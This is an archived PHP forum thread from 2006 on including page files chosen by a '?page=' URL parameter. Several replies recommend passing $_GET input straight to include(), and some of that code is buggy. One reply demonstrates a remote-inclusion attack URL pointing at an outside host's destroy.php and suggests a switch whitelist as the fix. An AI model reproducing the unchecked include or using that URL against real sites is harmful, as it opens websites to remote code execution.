Jump to content

Archived

This topic is now archived and is closed to further replies.

mccabre1

include file from url query

Recommended Posts

Hi, I'm trying to include files in my 'index.php' page based on the url. My menu links to:

index.php?page=home
index.php?page=news
index.php?page=contact

then I want to include the content based on that url, so if it reads 'index.php?page=home' it will load 'home.php'.

I currently have this line of code to call the file:
[code]
<? include ("$page.php"); ?>
[/code]

Now, when I load my page it can't find the file and doesn't recognise the 'page=' bit of the url.

Can anyone tell me what I'm doing wrong??

Thanks.
C

Share this post


Link to post
Share on other sites
May it works, i don't test ;)

[code]<?php
   $page = $_GET['page'];
   include $page;
?>[/code]

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye

Share this post


Link to post
Share on other sites
[!--quoteo(post=346437:date=Feb 16 2006, 05:26 PM:name=Darkness Soul)--][div class=\'quotetop\']QUOTE(Darkness Soul @ Feb 16 2006, 05:26 PM) [snapback]346437[/snapback][/div][div class=\'quotemain\'][!--quotec--]
May it works, i don't test ;)

[code]<?php
   $page = $_GET['page'];
   include $page;
?>[/code]

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye
[/quote]

Yes! That's fantastic, thanks very much! I wrote the code out as follows:

[code]
<?
$page = $_GET['$page'];
include ("$page.php");
?>
[/code]

- '.php' is the file extension on my includes.

Thanks again,
Chris

Share this post


Link to post
Share on other sites
Also, when using the $page on many different things - such as specifying the page 'title', just put the following above your doctype:

[code]
<? $page = $_GET['page']; ?>
[/code]

Thanks again!

Chris

Share this post


Link to post
Share on other sites
Yep, that's the cool side of the for.. code!

You aways can use it for all pages with one code.. something like..

[code]<?php

   // Before headers
   $page = $_GET [ '$page' ];

   // Now, test the URL query for security {thanks another topic}
   if ( !is_file ( "$page.php" ) && $page != "" )
   {
      // File not found!!!
      header ( "location: index.php" );
   }
   // Are you in index?
   elseif ( $page == "" )
   {
      $page = "home";
   }

   // Inside <title></title> tags
   print "You are in ". $page";

   // Calling the specific page
   include ( "$page.php" );

   // (...)
?>[/code]

=)

Share this post


Link to post
Share on other sites
Howdy,

I found this code on a search. I used it and it worked. I just changed the "s to 's and it stopped working. I was just wondering why?

It causes no problem I'll just use "s instead.

[code]include ("$page.php");[/code]

Share this post


Link to post
Share on other sites
If am I wrong, please tell me.. but, i think..

When you use " ", the PHP allow you to write variables inside, when you use ' ', you are not allowed to.

Like your include, test both of these:
[code]
// may work
require ( "$page.php" );
require ( $page .'.php' );

// may not work
require ( '$page' . '.php' );
require ( '$page.php' ); [/code]
=)

Share this post


Link to post
Share on other sites
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.

Share this post


Link to post
Share on other sites
[!--quoteo(post=347945:date=Feb 21 2006, 01:28 PM:name=heckenschutze)--][div class=\'quotetop\']QUOTE(heckenschutze @ Feb 21 2006, 01:28 PM) [snapback]347945[/snapback][/div][div class=\'quotemain\'][!--quotec--]
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.
[/quote]
Could I also stick my site URL infront of the $page value? So that if someone tried to put their own URL in it would be [a href=\"http://mydomain.com/index.php?page=http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/index.php?page=http://...ite.com/destroy[/a]

Then $page would equal [a href=\"http://mydomain.com/http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/http://theirsite.com/destroy[/a] and this would give a 404.

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.